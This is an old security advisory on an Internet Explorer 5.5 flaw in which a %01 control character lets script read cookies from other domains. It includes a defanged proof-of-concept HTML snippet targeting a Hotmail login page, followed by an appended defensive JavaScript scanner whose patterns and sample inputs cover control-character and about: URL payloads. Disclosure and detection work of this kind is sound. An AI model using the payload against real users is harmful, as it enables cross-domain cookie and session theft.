Internet Explorer "square" security hole
------------------------------------------------------------------------

SUMMARY

When a 'square' (an undisplayable character, which is equal to the 1st character in the ASCII table) is inserted in some strategic position in JavaScript code, it is possible to access local files, the IFRAMES DOM, cookies from other domains and more.

DETAILS

Vulnerable systems:
Microsoft Internet Explorer version 5.5

The original "%01" bug <http://www.securiteam.com/exploits/Internet_Explorer_5_0___01_security_bug__found__new_.html> was discovered by Georgi Guninski. The bug affected various versions of IE and was patched later. It involved the usage of %01 to cause scripts to be executed, even when they should not.

The following code is an example of a new attack that is very similar to the previous one. The code will access cookies of any domain:
(Before testing this code replace '!' with 'i' in the script tag)

<OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389" width="1024" height="500">
<PARAM NAME="URL" value="about:<iframe id=box src='http://lc2.law5.hotmail.passport.com/cgi-bin/login' width='800' ></iframe><scr!pt>setTimeout ('alert(\'your cookie from hotmail \'+box.document.cookie)',10000) </scr!pt> http://lc2.law5.hotmail.passport.com/cgi-bin/login">
</OBJECT>

Additional demonstrations can be found at http://horoznet.com/AlpSinan.

--
Eko Sulistiono
MIKRODATA & AntiVirus Media
Web: http://www.mikrodata.co.id/
WAP: http://www.mikrodata.co.id/wap/index.wml
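A defensive check for the patterns this advisory describes, added here as an example and not part of the original advisory or post: it scans HTML for URL-bearing attributes that contain a raw or percent-encoded control character (such as %01) or an about: URL that carries markup. The attribute list, rule names and sample inputs are assumptions constructed for illustration.

```javascript
// Added example (not from the advisory): flag URL-bearing attributes that
// contain control characters or about: URLs used to smuggle markup.
// Attribute list and rule names are assumptions chosen for this sketch.
const URL_ATTRS = /\b(src|href|value|data|action)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
const RAW_CTRL = /[\x00-\x08\x0b\x0c\x0e-\x1f]/;   // C0 controls except TAB, LF, CR
const ENC_CTRL = /%(?:0[0-8bcef]|1[0-9a-f])/i;      // the same range, percent-encoded
const ABOUT_MARKUP = /^\s*about:[\s\S]*</i;         // about: URL whose body contains a tag

function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(URL_ATTRS)) {
    const attr = m[1].toLowerCase();
    // Group 2 holds a double-quoted value, group 3 a single-quoted one.
    const value = m[2] !== undefined ? m[2] : m[3];
    const rules = [];
    if (RAW_CTRL.test(value)) rules.push("raw-control-char");
    if (ENC_CTRL.test(value)) rules.push("encoded-control-char");
    if (ABOUT_MARKUP.test(value)) rules.push("about-url-with-markup");
    if (rules.length > 0) findings.push({ attr, rules });
  }
  return findings;
}

// Constructed sample inputs; hosts under example.test are placeholders.
const SAMPLES = {
  benign: '<a href="https://example.test/login?next=%2Fhome">sign in</a>',
  encoded: '<a href="https://example.test/%01/page">x</a>',
  raw: '<iframe src="https://example.test/a\u0001b"></iframe>',
  aboutMarkup: '<param name="URL" value="about:<b>hi</b>">',
};

// Summarise every sample as "name: rule,rule" (or "name: clean").
function report() {
  return Object.entries(SAMPLES).map(([name, html]) => {
    const hits = scanHtml(html).flatMap((f) => f.rules);
    return `${name}: ${hits.length ? hits.join(",") : "clean"}`;
  });
}

console.log(report().join("\n"));
```

A content filter or mail gateway could apply the same rules to HTML parts before delivery; a real deployment would use an HTML parser rather than a regular expression to extract attributes.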
